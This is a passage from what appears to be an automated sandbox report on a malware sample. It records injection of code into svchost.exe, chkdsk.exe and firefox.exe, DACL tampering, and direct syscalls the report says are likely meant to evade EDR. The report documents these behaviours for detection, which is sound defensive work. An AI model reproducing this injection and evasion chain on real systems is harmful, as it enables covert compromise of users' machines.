Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]	2_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]	2_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]	2_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]	2_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]	2_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]	2_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]	2_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]	2_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]	2_2_030D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]	2_2_030DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]	2_2_0302CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]	2_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]	2_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]	2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]	2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]	2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]	2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]	2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]	2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_030DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]	2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]	2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]	2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]	2_2_0305EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_030BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]	2_2_030BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]	2_2_0306CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]	2_2_0305EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]	2_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]	2_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]	2_2_0306CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]	2_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]	2_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]	2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]	2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]	2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]	2_2_030DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]	2_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]	2_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]	2_2_03104A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]	2_2_03068A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]	2_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]	2_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]	2_2_03086AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]	2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]	2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]	2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]	2_2_03030AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]	2_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]	2_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]	2_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]	2_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]	2_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]	2_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]	2_2_030BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]	2_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]	2_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]	2_2_030B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]	2_2_030C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]	2_2_030B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104940 mov eax, dword ptr fs:[00000030h]	2_2_03104940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]	2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]	2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]	2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]	2_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]	2_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]	2_2_030BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]	2_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]	2_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]	2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]	2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]	2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]	2_2_030C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]	2_2_030649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_030FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_030BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]	2_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]	2_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]	2_2_030BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]	2_2_0306A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]	2_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]	2_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]	2_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060854 mov eax, dword ptr fs:[00000030h]	2_2_03060854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034859 mov eax, dword ptr fs:[00000030h]	2_2_03034859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034859 mov eax, dword ptr fs:[00000030h]	2_2_03034859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h]	2_2_030BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h]	2_2_030BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h]	2_2_030C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h]	2_2_030C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030887 mov eax, dword ptr fs:[00000030h]	2_2_03030887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC89D mov eax, dword ptr fs:[00000030h]	2_2_030BC89D

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A4A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00A4A66C

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A381AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00A381AC
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A38189 SetUnhandledExceptionFilter,		0_2_00A38189

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtCreateMutant: Direct from: 0x774635CC	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtWriteVirtualMemory: Direct from: 0x77462E3C	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtMapViewOfSection: Direct from: 0x77462D1C	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtResumeThread: Direct from: 0x774636AC	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtProtectVirtualMemory: Direct from: 0x77462F9C	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtSetInformationProcess: Direct from: 0x77462C5C	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtSetInformationThread: Direct from: 0x774563F9	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtNotifyChangeKey: Direct from: 0x77463C2C	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtProtectVirtualMemory: Direct from: 0x77457B2E	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtAllocateVirtualMemory: Direct from: 0x77462BFC	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtQueryInformationProcess: Direct from: 0x77462C26	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtResumeThread: Direct from: 0x77462FBC	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtReadFile: Direct from: 0x77462ADC	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtQuerySystemInformation: Direct from: 0x77462DFC	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtDelayExecution: Direct from: 0x77462DDC	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtAllocateVirtualMemory: Direct from: 0x77463C9C	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtCreateUserProcess: Direct from: 0x7746371C	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtWriteVirtualMemory: Direct from: 0x7746490C	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtAllocateVirtualMemory: Direct from: 0x774648EC	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtQuerySystemInformation: Direct from: 0x774648CC	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtQueryVolumeInformationFile: Direct from: 0x77462F2C	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtCreateKey: Direct from: 0x77462C6C	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtReadVirtualMemory: Direct from: 0x77462E8C	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtSetInformationThread: Direct from: 0x77462B4C	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtQueryAttributesFile: Direct from: 0x77462E6C	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtDeviceIoControlFile: Direct from: 0x77462AEC	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtOpenSection: Direct from: 0x77462E0C	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtCreateFile: Direct from: 0x77462FEC	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtOpenFile: Direct from: 0x77462DCC	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtQueryInformationToken: Direct from: 0x77462CAC	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtTerminateThread: Direct from: 0x77462FCC	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtAllocateVirtualMemory: Direct from: 0x77462BEC	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	NtOpenKeyEx: Direct from: 0x77462B9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: NULL target: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: NULL target: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\chkdsk.exe

Thread register set: target process: 3016

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 3F9008

